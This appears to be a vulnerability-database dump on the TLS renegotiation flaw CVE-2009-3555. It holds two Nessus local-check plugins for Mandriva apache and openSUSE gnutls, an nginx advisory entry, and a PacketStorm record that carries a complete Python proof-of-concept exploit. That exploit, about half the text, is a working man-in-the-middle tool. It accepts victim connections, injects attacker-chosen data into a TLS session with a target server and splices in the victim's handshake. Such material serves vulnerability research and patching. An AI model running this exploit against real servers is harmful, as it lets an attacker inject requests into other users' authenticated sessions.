value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-base-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-devel-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-htcacheclean-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_authn_dbd-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_cache-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dav-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_dbd-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_deflate-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_disk_cache-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_file_cache-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ldap-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_mem_cache-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_ssl-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mod_userdir-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-modules-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-event-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-itk-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-peruser-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-prefork-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-mpm-worker-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"apache-source-2.2.9-12.5mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-base-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-devel-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-htcacheclean-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_authn_dbd-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_cache-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_dav-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_dbd-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_deflate-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_disk_cache-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_file_cache-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_ldap-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_mem_cache-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_proxy-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_proxy_ajp-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_ssl-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mod_userdir-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-modules-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mpm-event-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mpm-itk-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mpm-peruser-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mpm-prefork-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-mpm-worker-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"apache-source-2.2.11-10.6mdv2009.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-base-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-devel-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-htcacheclean-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_authn_dbd-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_cache-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_dav-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_dbd-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_deflate-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_disk_cache-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_file_cache-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_ldap-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_mem_cache-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_proxy-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_proxy_ajp-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_proxy_scgi-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_ssl-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mod_userdir-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-modules-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mpm-event-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mpm-itk-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mpm-peruser-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mpm-prefork-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-mpm-worker-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"apache-source-2.2.14-1.1mdv2010.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-02-01T02:13:47", "bulletinFamily": "scanner", "description": "The SSL-renegotiation ", "modified": "2020-02-02T00:00:00", "id": "SUSE_11_1_GNUTLS-101025.NASL", "href": "https://www.tenable.com/plugins/nessus/53660", "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3388.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53660);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:38\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-1)\");\n script_summary(english:\"Check for the gnutls-3388 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SSL-renegotiation 'authentication gap' has been fixed in gnutls.\nCVE-2009-3555 has been assigned to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"gnutls-2.4.1-24.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-devel-2.4.1-24.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-extra-devel-2.4.1-24.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-extra26-2.4.1-24.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls26-2.4.1-24.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.4.1-24.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "nginx": [{"lastseen": "2019-05-29T17:19:07", "bulletinFamily": "software", "description": "The renegotiation vulnerability in SSL protocol\nSeverity: major\nCVE-2009-3555\nNot vulnerable: 0.8.23+, 0.7.64+\nVulnerable: 0.1.0-0.8.22", "modified": "2009-11-09T17:30:00", "published": "2009-11-09T17:30:00", "id": "NGINX:CVE-2009-3555", "href": "http://nginx.org/en/security_advisories.html", "type": "nginx", "title": "The renegotiation vulnerability in SSL protocol", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:34", "bulletinFamily": "exploit", "description": "", "modified": "2009-12-21T00:00:00", "published": "2009-12-21T00:00:00", "href": "https://packetstormsecurity.com/files/84112/TLS-Renegotiation-Exploit.html", "id": "PACKETSTORM:84112", "type": "packetstorm", "title": "TLS Renegotiation Exploit", "sourceData": "`#!/usr/bin/env python \n \n###################################### \n# # \n# RedTeam Pentesting GmbH # \n# kontakt@redteam-pentesting.de # \n# http://www.redteam-pentesting.de # \n# # \n###################################### \n \n# PoC exploit for the TLS renegotiation vulnerability (CVE-2009-3555) \n \n# License \n# ------- \n# CC-BY-SA http://creativecommons.org/licenses/by-sa/3.0/ \n \n# Timeline \n# -------- \n# 2009-12-21 initial public release \n \n# Known Issues \n# ------------ \n# Firefox: if it fails connecting to a TLS site too often, falls back to \n# issuing SSLv2 ClientHello only until browser is restarted \n# \n# wget: attempts SSLv2 ClientHello by default \n \n# References \n# ---------- \n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 \n# http://www.phonefactor.com/sslgap \n# http://www.extendedsubset.com/ \n# http://www.g-sec.lu/practicaltls.pdf \n# http://tools.ietf.org/html/draft-ietf-tls-renegotiation-01 \n \nimport tlslite \nimport tlslite.api \nimport tlslite.messages \nimport tlslite.constants \nimport struct \nimport socket \nimport threading \nimport array \nimport sys \nimport optparse \n \n \nif not hasattr(threading.Thread, 'name'): \n# emulate python 2.6 threading module for earlier versions \nthreading.current_thread = threading.currentThread \nsetattr(threading.Thread, 'name', \nproperty(threading.Thread.getName, threading.Thread.setName)) \n \ndef forward(sock1, sock2): \nsock1.settimeout(1.0) \nwhile True: \ntry: \ndata = sock1.recv(4096) \nif not data: \nreturn \nsock2.send(data) \nexcept socket.error, ex_error: \nif ex_error[0] == 104: # Connection reset by peer \nreturn \nexcept socket.timeout, ex_timeout: \npass \n \n \nclass MessageWrapper(object): \ndef __init__(self, version = (3, 1), ssl2 = False): \nself.contentType = tlslite.messages.ContentType.handshake \nself.ssl2 = ssl2 \nself.client_version = version \n \ndef setType(self, type): \nself.contentType = type \n \ndef addBytes(self, bytes): \nself.bytes = bytes \n \ndef write(self, trial=False): \nif trial: \nraise Exception('Unsupported') \nreturn array.array('B', self.bytes) \n \ndef send_record(sock, msg_type, version_major, version_minor, record): \nmsg = struct.pack('!BBBH', msg_type, version_major, version_minor, len(record)) \nif type(record) != str: \nmsg += record.tostring() \nelse: \nmsg += record \nsock.send(msg) \n \ndef send_encapsulated(sslsock, type, messagebytes, version = (3, 1)): \nmsg = MessageWrapper(version) \nmsg.addBytes(struct.unpack('B'*len(messagebytes), messagebytes)) \nmsg.setType(type) \nfor dummy in sslsock._sendMsg(msg, True): \npass \n \ndef decrypt_record(sslsock, type, recordbytes): \nfor result in sslsock._decryptRecord(type, array.array('B', recordbytes)): \npass \nreturn result \n \ndef recv_record(sock): \ntry: \nheader = sock.recv(5) \nif not header: \nreturn None, None, None, None \nmsg_type, msg_version_major, msg_version_minor, msg_length = struct.unpack('!BBBH', header) \nrecord = '' \nwhile len(record) != msg_length: \nrecord += sock.recv(msg_length - len(record)) \nreturn msg_type, msg_version_major, msg_version_minor, record \nexcept socket.error, ex: \nif ex[0] == 104: # Connection reset by peer \nreturn \n \ndef recv_clienthello(sock): \nheader_bytes = [] \nheader_bytes.append(sock.recv(1)) \nheader_bytes[0] = struct.unpack('!B', header_bytes[0])[0] \nif header_bytes[0] & 0x80: \n# Version 2.0 Client \"Record Layer\" \nheader_bytes.append(sock.recv(1)) \nheader_bytes[1] = struct.unpack('!B', header_bytes[1])[0] \nmsg_length = (header_bytes[0] & 0x7f) << 8 | header_bytes[1] \nmsg_version_major = 2 \nmsg_version_minor = 0 \nmsg_type = tlslite.constants.ContentType.handshake \nrecord = sock.recv(msg_length) \nelse: \nheader = sock.recv(4) \nmsg_type = header_bytes[0] \nmsg_version_major, msg_version_minor, msg_length = struct.unpack('!BBH', header) \nrecord = sock.recv(msg_length) \n \nreturn msg_type, msg_version_major, msg_version_minor, record \n \ndef send_hello_request(sock): \nsock.send(\"\\x16\" # Record Layer: Handshake Message \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x04\" # Record Layer Length: 4 \n+\"\\x00\" # Handshake Message Type: Hello Request \n+\"\\x00\\x00\\x00\") # Handshake Message Length: 0 \n \ndef send_protocol_version_alert(sock): \nsock.send(\"\\x15\" # Record Layer: Alert\" \n+\"\\x03\\x01\" # Record Layer Version: TLS 1.0 \n+\"\\x00\\x02\" # Record Layer Length: 2 \n+\"\\x00\" # Alert Message: fatal \n+\"\\x46\") # Alert Message: protocol version \n \n \ndef handle_victim(victim, options, mitmcount): \n \nif options.one_shot and mitmcount != 0: \nprint threading.current_thread().name, '--one-shot specified and initial connection already handled, forwarding only' \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nt1 = threading.Thread(target=forward, args=(sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sock)) \nt2.start() \n \nt1.join() \nsock.close() \n \nt2.join() \nvictim.close() \nreturn \n \n# obtain initial \"client hello\" message \nmsg_type, msg_version_major, msg_version_minor, hello_msg = recv_clienthello(victim) \nif msg_version_major == 2: \nprint threading.current_thread().name, \"client sent SSLv2 client hello message, exiting thread\" \nreturn \n \ntls_version = (msg_version_major, msg_version_minor) \ntype, length, version_major, version_minor, random, session_id_length = struct.unpack('!B3sBB32sB', hello_msg[:39]) \nresume_session = (session_id_length != 0) \nif resume_session: \nprint threading.current_thread().name, \"client attempting to resume session\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nsock.connect(options.target) \nprint threading.current_thread().name, 'Connected to target %s:%u' % options.target \nexcept socket.error, ex: \nprint threading.current_thread().name, 'Couldn\\'t connect to target %s:%u' % options.target \nprint threading.current_thread().name, 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \n \nsslsock = tlslite.api.TLSConnection(sock) \nhandshake_settings = tlslite.HandshakeSettings.HandshakeSettings() \nhandshake_settings.minVersion = tls_version \nhandshake_settings.maxVersion = tls_version \nsslsock.handshakeClientCert(settings = handshake_settings) \n \n# inject prefix \nsslsock.write(options.inject) \nprint threading.current_thread().name, 'Injected %s' % repr(options.inject) \n \n# send original \"client hello\" message over the encrypted channel \nsend_encapsulated(sslsock, 22, hello_msg, tls_version) \n \n# now receive serveral TLS messages from the server, decrypt them, and forward \n# them to the client, until the server sends \"server hello done\" \n# these messages include \"server hello\", \"certificate\", \"server key exchange\", \n# unless the client is trying to resume a previous session \nprint threading.current_thread().name, \"about to receive server handshake messages\" \nserver_handshake_done = False \nwhile not server_handshake_done: \nmsg_type, msg_version_major, msg_version_minor, result = recv_record(sslsock.sock) \nif result: \nresult = decrypt_record(sslsock, msg_type, result) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \nif result[0] == 0x0e: # server hello done - should terminate handshake \nserver_handshake_done = True \nelif resume_session and msg_type == 0x14: # change cipher spec - probably irrelevant \nserver_handshake_done = True \nelse: \nprint threading.current_thread().name, 'receive from server failed, exiting thread' \nreturn \nprint threading.current_thread().name, \"server handshake done\" \n \n \n# now its the the client's turn to send some messages, e.g. \n# \"client key exchange\" and \"change cipher spec\" \nprint threading.current_thread().name, \"about to receive client handshake messages\" \nhandshake_finished = False \nwhile not handshake_finished: \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nprint threading.current_thread().name, msg_type \nsend_encapsulated(sslsock, msg_type, record, tls_version) \nif msg_type == 0x14: # change cipher spec \nhandshake_finished = True \n \nprint threading.current_thread().name, \"client handshake done\" \n \n# message after \"change cipher spec\" must be sent in the \"clear\" \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(victim) \nsend_record(sslsock.sock, msg_type, msg_version_major, msg_version_minor, record) \n \n# server should now send \"change cipher spec\" message, we decrypt and send that to the victim \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nresult = decrypt_record(sslsock, msg_type, record) \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, result) \n \n# finalize handshake \nmsg_type, msg_version_major, msg_version_minor, record = recv_record(sslsock.sock) \nif record: \nsend_record(victim, msg_type, msg_version_major, msg_version_minor, record) \nelse: \nsslsock.sock.close() \nvictim.close() \ndel sslsock \nreturn \n \n \n \n# the rest is just forwarding TLS records between both parties, \n# which we cannot interfere with anymore, apart from dropping server \n# responses \nif options.drop: \nsslsock.sock.close() \ndel sslsock \nelse: \nt1 = threading.Thread(target=forward, args=(sslsock.sock, victim)) \nt1.start() \n \nt2 = threading.Thread(target=forward, args=(victim, sslsock.sock)) \nt2.start() \n \nif not options.drop: \nt1.join() \nsslsock.sock.close() \n \nt2.join() \nvictim.close() \n \n \n \nif __name__ == \"__main__\": \nparser = optparse.OptionParser() \nparser.add_option('-l', '--listen', dest='listen_port', help='port to listen on', metavar='PORT', type='int', default=8443) \nparser.add_option('-b', '--bind', dest='bind_address', help='address to bind to', metavar='ADDRESS', default='0.0.0.0') \nparser.add_option('-t', '--target', dest='target', help='host and port to connect to', metavar='HOST:PORT' ) \nparser.add_option('-i', '--inject', dest='inject', help='string to inject', metavar='DATA') \nparser.add_option('', '--inject-file', dest='inject_file', help='inject data from a file', metavar='FILE') \nparser.add_option('', '--inject-base64', dest='inject_base64', help='string to inject, base64-encoded', metavar='DATA') \nparser.add_option('-o', '--one-shot', dest='one_shot', action='store_true', help='only mitm the first connection attempt, forward all other connections') \nparser.add_option('-d', '--drop-responses', dest='drop', action=\"store_true\", default=False, help='drop server responses after renegotiating') \n \n(options, args) = parser.parse_args() \n \nif len([i for i in (options.inject, options.inject_file, options.inject_base64) if i]) != 1: \nprint 'Exactly one injection option must be specified' \nsys.exit(1) \n \nif options.inject_file: \ntry: \noptions.inject = open(options.inject_file, 'r').read() \nexcept IOError, ex: \nprint ex \nsys.exit(1) \n \nif options.inject_base64: \nimport base64 \ntry: \noptions.inject = base64.decodestring(options.inject_base64) \nexcept base64.binascii.Error, ex: \nprint 'Error decoding base64 data: %s' % ex \nsys.exit(1) \n \n \nif not options.listen_port or \\ \nnot options.bind_address or \\ \nnot options.target or \\ \nnot options.inject: \nparser.print_help() \nsys.exit(1) \n \ntarget = options.target.split(':') \nif len(target)==2: \ntry: \ntarget[1] = int(target[1]) \nexcept ValueError: \ntarget[1] = None \nif len(target)!=2 or not target[0] or not target[1]: \nprint 'Target \\'%s\\' not in format HOST:PORT' % options.target \nsys.exit(1) \n \noptions.target = tuple(target) \n \ntry: \nlistensocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nlistensocket.bind((options.bind_address, options.listen_port)) \nprint 'Listening on %s:%u' % (options.bind_address, options.listen_port) \nexcept socket.error, ex: \nprint 'Couldn\\'t listen on %s:%u' % (options.bind_address, options.listen_port) \nprint 'Error code %u, \\'%s\\'' % (ex[0], ex[1]) \nsys.exit(1) \n \nlistensocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \nlistensocket.listen(5) \n \nmitmcount = 0 \n \nwhile True: \ntry: \nvictim, victimaddr = listensocket.accept() \nprint 'New connection from %s:%u' % victimaddr \n \nthreading.Thread(target=handle_victim, args=(victim, options, mitmcount)).start() \nmitmcount += 1 \n \nexcept KeyboardInterrupt, ex: \nprint '\\nAborted by user, exiting...' \nlistensocket.close() \nsys.exit(1) \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/84112/tls-reneg.py.txt", "cvss": {"score": 5.8, "vector": 